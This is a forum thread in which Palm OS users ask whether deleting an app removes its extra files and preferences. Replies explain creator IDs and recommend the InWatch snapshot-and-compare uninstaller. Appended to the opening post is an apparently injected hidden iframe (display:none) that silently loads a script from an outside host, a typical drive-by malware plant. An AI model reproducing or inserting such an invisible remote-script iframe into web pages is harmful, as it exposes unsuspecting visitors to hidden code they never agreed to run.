+ Reply to Thread

A dump palm user!!

I have a question about installing and uninstalling apps on the palm. To put stuff in the palm I use the install tool to place for example 4 files to run 1 program. If I use the delete function from the main screen menu. Does that delete all the files placed there by the desktop install tool. This is my first palm os device and I am clueless as to how it works.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: A dump palm user!!

If all you see in the launcher is the one App icon (and not icons for the other 3 files), then yes, deleting the app will get them all, because they will all have the same unique app id embedded in them, and the launcher's delete function knows to delete everything associated with the app via the app id.

Originally posted by TCruz
    I have a question about installing and uninstalling apps on the palm. To put stuff in the palm I use the install tool to place for example 4 files to run 1 program. If I use the delete function from the main screen menu. Does that delete all the files placed there by the desktop install tool. This is my first palm os device and I am clueless as to how it works.

You're not so dump! Seems like a legitimate question to me is all.

Thanks for the replys, also I forgot to ask, does palm os keep track of things like windows regidtry where files and entrys are always being added but never removed by uninstalling programs. Once again just curious about how the palm os works.

No, thank {God/diety of your choice}, there is no registry or any other Microsoft-like needless bloat! There are preferences and features that can hold data, but again these are keyed to the app by the ID and are deleted as are the data files along with the app. The only way these prefs can get orphaned is when you use a low level utility like Filez to delete the app, this will leave all the prefs and DBs out there, which is a good reason not to use it for deleting apps.

Originally posted by TCruz
    Thanks for the replys, also I forgot to ask, does palm os keep track of things like windows regidtry where files and entrys are always being added but never removed by uninstalling programs. Once again just curious about how the palm os works.

thank you!!!!!!!!!!!!!!!!!
    i was wanting to try out some demos but didnt want to clutter the thing up with usless gargabe when I got rid of demos I didn't like.

This is a shameless plug, but InWatch, available at www.stacworks.com will make sure all those orphaned databases and preferences that are left behind will get removed. A lot of apps don't use the same creator ID for files and preferences, and hence a lot of junk gets left behind when you are trying out software.

Wade,
    Does it handle programs that reside on a card? I registered a similar program a few years ago and it treats preferences associated to programs on a card as orphans.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

You should do the Compare before you move the file to the card. Then it will work fine.

With multiple different programs using multiple different directories on the card, there is no way for the Pre-Clean feature to guarantee accurate results. If you do a Snapshot and Compare with each new installation, you shouldn't need to use Pre-Clean anyways.

How do you do a snapshot and compare. Is that an extra piece of software or is it already there?

You do a Snapshot and Compare from with the program called InWatch, you can download it at the link above.

Thanks I will !!!!

Inwatch is da bomb............
    using this I wont be afraid to try and try demos.

Originally posted by wcarlson40
    This is a shameless plug, but InWatch, available at www.stacworks.com will make sure all those orphaned databases and preferences that are left behind will get removed. A lot of apps don't use the same creator ID for files and preferences, and hence a lot of junk gets left behind when you are trying out software.
    Is it ever dangerous to use InWatch? I was using PrefEd to view my saved prefs and noticed that there are a bunch of entries with Creator ID of "inet" (on a 6035) that don't have an app owning them. It looks like they contain WebClipping prefs. Does InWatch confirm deletes? Also does anyone know for sure about these "inet" prefs?

I am currently at work and have not downloaded it yet but from reading on their site about how it works I dont any danger using the snapshot and compare. You take a snapshot of your system before an install, install your program , and then compare it to the snapshot. Inwatch then records the differences and those are the only files that are deleted for that programs uninstallion.

Actually, he is correct. Using the Snapshot and Compare method is very safe. There is no guesswork involved.

Trying to guess which preferences are orphaned by other methods can be risky, but the worst thing that can happen is that you will either have to re-enter registration codes for certain applications, or you will have to re-set certain settings from within applications. The risk of losing actual data is probably pretty close to zero.

I downloaded it last night. Did a hard reset to start from scratch. I was amazed at all the extra files created by the programs. I put in 2 files , it creates 8 more. I reloaded them (I think about programs) 1 at a time and compared after each install. Well i missed 1 of them Documents to go. It wants you to do a second sync after the installation is complete and I had IW hotsync turned on, so I lost that snapshot. But docs to go probably wont be uninstalled anyway.

To recap: I like it......